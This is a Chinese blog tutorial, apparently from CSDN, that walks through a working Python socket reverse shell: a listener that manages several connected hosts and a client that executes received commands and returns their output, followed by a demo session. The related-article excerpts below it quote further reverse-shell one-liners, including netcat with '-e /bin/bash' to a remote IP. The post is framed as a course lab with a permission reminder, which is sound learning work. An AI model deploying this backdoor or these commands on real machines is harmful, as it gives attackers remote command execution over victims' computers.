PythonSocket完成反向shell控制计算机

最新推荐文章于 2022-11-14 22:17:25 发布
最新推荐文章于 2022-11-14 22:17:25 发布
阅读量428 收藏 2
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39098318/article/details/105128161
版权

背景

记起有个学期老师教网络攻防讲到了反向shell,从当时的看不懂老师给的代码到现在自己用写一个,这大概就是成长吧!

一、思路

反向shell一般都是由C/S结构发生,我理解的意思大概就是别人说在一包糖里面拿一颗,结果却拿了一整包。先由服务端监听,当有人连接上我们时,我们再通过这个连接发送指令给客户端执行,执行完之后反馈消息给我们。
总体思路:
S:监听->等待->上钩->发送指令->接受信息
C:连接->接受指令->执行指令->发送信息

二、实现

1.Server端:

import socket
import threading

sock = socket.socket()
sock.bind(('0.0.0.0',6666))
sock.listen(1024)      #1024代表排队个数
socklist = []          #存放socket连接
numm = None           #定义主机号
def con():              #主要保存主动上钩的连接
    num = 0
    print('等待主机加入')
    while True:
        (sk, addrport) = sock.accept()   #接收连接并返回一个套接字sk,addrport是地址跟端口,(sk,addrport)是一个元组
        socklist.append((sk, addrport))     #把接受的元组放进列表,保存起来,反向shell的重要事情!
        print(f'\n主机{addrport}加入成功,num={num}\n')
        num = num + 1

def who():          #选择主机函数
    global numm	
    numm = input('\n输入要控制主机的num')
    print(f'选择主机{socklist[int(numm)][1][0]}成功')


def action():        #执行命令函数
    while True:
        cmd = input('输入命令:')
        if len(socklist) > 1 and cmd == 'cchange' :
            who()
            action()
        if cmd == 'eexit' :
            print('退出程序。')
            exit()

        socklist[int(numm)][0].send(cmd.encode('utf-8')) #发送指令到client端
        data = socklist[int(numm)][0].recv(8192)   #接收反馈的信息
        print(data.decode('utf-8'))


def main():   #主函数,(运行函数)
    threading.Thread(target=con,args=()).start()  #挂一个线程保持接收连接
    while True:
        if len(socklist) != 0:
            who()
            action()

if __name__ == '__main__':  #程序运行入口
    main()

2.Client端
client端比较简单,发起连接,接受指令,执行指令,发送消息即可,其中执行指令用到subprocess模块,subprocess.getoutput()方法可以返回执行指令后的信息,更多用法自行学习哈。

import socket
import subprocess

sock=socket.socket()
sock.connect(('127.0.0.1',6666))
while True:
    data = sock.recv(1024)
    da = data.decode('utf-8')
    fankui = subprocess.getoutput(da)
    sock.sendall(fankui.encode('utf-8'))

效果:

C:/Users/blanklee/PycharmProjects/fxshell/server.py
等待主机加入

主机('192.168.1.107', 54085)加入成功,num=0


输入要控制主机的num
0
选择主机192.168.1.107成功
输入命令:ipconfig

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::a011:7e57:4108:697a%10
   IPv4 地址 . . . . . . . . . . . . : 192.168.1.107
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.1.1
输入命令:dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 DEAD-D713

 C:\Python37 的目录

2020/03/26  19:32    <DIR>          .
2020/03/26  19:32    <DIR>          ..
2020/03/26  19:34               246 client.py
2020/03/26  19:11    <DIR>          DLLs
2019/09/12  18:52    <DIR>          Doc
2020/03/26  19:11    <DIR>          include
2020/03/26  19:12    <DIR>          Lib
2020/03/26  19:12    <DIR>          libs
2019/03/25  22:26            30,195 LICENSE.txt
2019/03/25  22:26           665,470 NEWS.txt
2019/03/25  22:23            99,856 python.exe
2019/03/25  22:22            58,896 python3.dll
2019/03/25  22:22         3,748,368 python37.dll
2019/03/25  22:23            98,320 pythonw.exe
2019/09/12  20:28             2,797 readme.txt
2020/03/26  19:18    <DIR>          Scripts
2020/03/26  19:12    <DIR>          share
2020/03/26  19:12    <DIR>          tcl
2020/03/26  19:12    <DIR>          Tools
2019/03/25  21:22            89,752 vcruntime140.dll
               9 个文件      4,793,900 字节
              11 个目录 103,630,409,728 可用字节
输入命令:
主机('127.0.0.1', 47651)加入成功,num=1

ipconfig

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::a011:7e57:4108:697a%10
   IPv4 地址 . . . . . . . . . . . . : 192.168.1.107
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.1.1
输入命令:cchange

输入要控制主机的num
1
选择主机127.0.0.1成功
输入命令:dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 BCA3-1618

 C:\Users\blanklee\PycharmProjects\baolipojiezip 的目录

2020/03/26  20:51    <DIR>          .
2020/03/26  20:51    <DIR>          ..
2020/03/19  15:46    <DIR>           
2020/03/26  20:58    <DIR>          .idea
2020/03/19  15:17               163 1.zip
2020/03/26  20:51               258 66.py
2020/03/19  15:47    <DIR>          D
2020/03/20  01:25               192 text.py
2020/03/19  14:59    <DIR>          venv
2020/03/20  19:27             2,035 zipbruteforce.py
               4 个文件          2,648 字节
               6 个目录 12,218,122,240 可用字节
输入命令:

结束

以上所有环境都是自己虚拟环境跟局域网的电脑,PyhonSocket完成反向shell控制计算机的实验就到这结束啦。
最后
温馨小提示:做网络攻防一定要得到对方的允许,不然容易触碰到法律哦。

blank#
关注
Python-基于socket实现的反向shell攻击后门
Vimor的博客
09-09 4980
下面给出一个基于socket实现的反向shell攻击,或者叫做控制工具吧,简单点说来就是在“受害者”电脑上留一个后门,“攻击者”可以通过这个连接这个socket实现在“受害者”电脑上执行各种指令,再直白一点就是一个socket通信的实例而已。 “受害者“端(后门):backdoor.py,这里充当一个socket服务端程序,主要实现连接的的监听、数据的收发和处理以及指令的执行 #!/u
使用Python和nc对远程主机进行反向shell链接
chenjafo的博客
08-15 4221
nc这个命令屌炸天,经常用作黑客工具。简单说下反向shell 2台Linux电脑 A:192.168.0.21 B:192.168.0.22 A设置nc -lv 8081 B执行nc 192.168.0.21 8080 -e /bin/bash 这样就A就可以链接上B计算机shell 但是-e这个参数默认时候是木有的,甚者nc命令都木有,可以自己下载源代码编译一个,略麻烦 但
Python socket编程
shell_x的博客
01-12 357
使用网络调试助手NetAssist,完成下面测试,需要的请留下邮箱 IP IP是internet protocol(网际互联协议)的缩写,是TCP/IP体系的网络层协议。 简单来说IP的目的是,用来标记网络上的一台电脑,每个数据包,都会携带源IP地址和目标IP地址。 查看网卡信息 linux ifconfig windows ipconfig IP地址分类 IPv4 已经用完了,目前...
Python Socket制作反弹shell连接脚本
qq_60115503的博客
05-09 553
# -*- codeing = utf-8 -*- # @time2022/5/3 13:24 # @Author:djx # @File:demo1.py # @Editor:PyCharm import os import socket import subprocess s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.106.128',1117)) os.dup2(s.fileno(),0) os.du.
python 反向shell 编程
悦信安In4sec
03-14 502
服务端(监听端): 建立套接字编程 绑定端口 监听 连接到后门 发送信息(例如命令whoami之类的) 接收到后门返回的信息后门(客服端): 建立套接字 连接服务器 接收服务器返回的信息 处理后返回给服务器程序: 服务端(监听端):#!/usr/bin/python import socket s = socket.socket(socket.AF_INET,socket.SO
反向Socket连接
十年磨一剑,霜刃未曾试!
03-24 2339
<br />mark一下,以后的开发过程可能会经常用到socket相关的东西,所以mark一下最基础的东西。<br /> <br />//服务端<br /> <br />#include <stdio.h><br />#include <windows.h><br />#pragma comment(lib,"ws2_32.lib")<br />void main()<br />{<br /> //初始化套接字版本<br /> WSAData wsaData;<br /> WSAStartup(MAKEW
rrs.tar.gz_python 实现shell_remote
09-14
5. **代码实现**:在Python,实现反向shell的代码可能包括创建socket对象,绑定到特定端口,然后使用`accept()`方法等待连接。客户端则会使用`connect()`方法连接到服务器,之后双方可以使用`sendall()`和`recv()`...
python shell根据ip获取主机名代码示例
09-21
计算机网络,经常需要通过IP地址来查询对应的主机名或者反向操作,即由主机名获取其IP地址。这种需求常见于网络管理和故障排查场景。Python作为一种强大的编程语言,提供了多种方式来实现这一功能。本文将详细...
Kali反向Shell攻击与防范
反向Shell攻击是一种常见的网络安全攻击手段,其原理是攻击者通过在受害主机上部署恶意代码,并与其建立一个反向Shell连接,从而获取对目标系统的控制权限。攻击者可以通过这样的渠道执行各种攻击操作,包括文件操作...
python反弹shell
最新发布
08-30
总结起来,Python反弹shell是一种攻击技术,攻击者通过在目标计算机执行恶意的Python程序,与自己的计算机建立反向连接,从而实现远程控制目标计算机执行命令的目的。然而,需要注意的是,这种行为是非法的,...
python反向连接
时光凉春衫薄的博客
10-17 501
&#13; https://blog.csdn.net/u010726042/article/details/73565068&#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13;
Python攻防-Socket通信建立TCP反向连接
道阻且长,行则将至。
08-17 2010
文章目录前言远程控制脚本编写效果演示脚本优化getopt ()完整代码效果演示 前言 本文将记录学习基于 Socket 通信机制建立 TCP 反向连接,借助 Python 脚本实现主机远程控制的目的。 我们在传输数据时,可以只使用(传输层)TCP/IP 协议,但是那样的话,如果没有应用层,便无法识别数据内容,如果想要使传输的数据有意义,则必须使用到应用层协议,应用层协议有很多,比如 HTTP、FTP、TELNET 等,也可以自己定义应用层协议。而 Socket 是对 TCP/IP 协议的封装,Socket
[Web安全]Python利用Socket反弹shell,多线程反弹Shell
_DESpiSED的博客
09-22 2010
本文详细介绍了Python利用套接字编程反弹shell和多线程反弹shell的过程,给网络安全初学者提供一定思路。
python3 基于 socket 反向代理 adb 设备
DevOps海洋的渔夫@专栏
12-05 1817
需求在跨网络的操作,我们想要连接一些内网服务,例如:对 机房内的安卓设备 进行 adb 连接。一般的做法呢,通常不想自己开发功能,可以有以下两种做法:可以采用 ssh 隧道的方式直接转...
通过python socket远程执行命令,并返回值
gswcfl
05-10 3521
通过python socket远程执行命令,并返回值
python 反弹shell 交互
qq_32851223的博客
11-14 1139
本篇介绍解决如下问题的python脚本:漏洞利用,监听攻击机的端口拿到反弹shell,利用反弹shell进行横向的信息探索。
Python3实现反向Shell
Pad0y的博客
09-28 2097
很多有名的远程控制工具都是基于C/S结构开发的,比如:灰鸽子、冰河、teamViewer等等。通常情况下是将Client作为控制端,Server作为被控端。这里笔者将采用反向连接的方式,将Server作为控制端,Client作为被控端。当然,这两种方式都可以实现功能。这里我采用反向连接的方式主要是考虑到肉鸡在内网,我们是无法直接连接到被控端的。如果用反向连接的方式,尽管被控端在内网,只要我们不在内网,或者我们做了内网端口映射、动态域
python写一个程序控制其它软件_程序员:利用Python实现可控制肉鸡的反向Shell...
weixin_39530437的博客
12-16 1160
一、初识1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为 Client 主动连接到我们的 Server 端,以实现对多个远程主机的管理!学习技能:了解TCP协议了解C/S结构程序设计Python socket模块的使用Python subprocess模块的使用1.2效果图二、理论基础以下内容整理自百度百科,参考链接:C/S结构T...
[原]利用极域电子教室控制别人电脑
热门推荐
奋斗
07-18 2万+
学校的极域电子教室程序及其烦人,上课的时候老师总是控制我们电脑,我一直想破解,所以发布了《[原]VC被控制时关闭极域电子教室、破解联想硬盘保护系统密码(上)》和《[原]VC被控制时关闭极域电子教室、破解联想硬盘保护系统密码下》两篇日志。前几天,我成功的利用了老师的极域电子教室实现了控制别人电脑。   所需材料: 虚拟机软件:建议使用VirtualBox,开源的,还不错。用虚拟机主要是虚拟机软件一关
正向shell反向shell
08-19
正向shell控制端主动发起连接去连接被控制端,而反向shell是被控制端主动连接控制端。在实际应用,大多数情况下采用反向shell,因为正向shell有很多因素导致连接失败,如硬件设备有防火墙、入侵防御系统等。此外...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值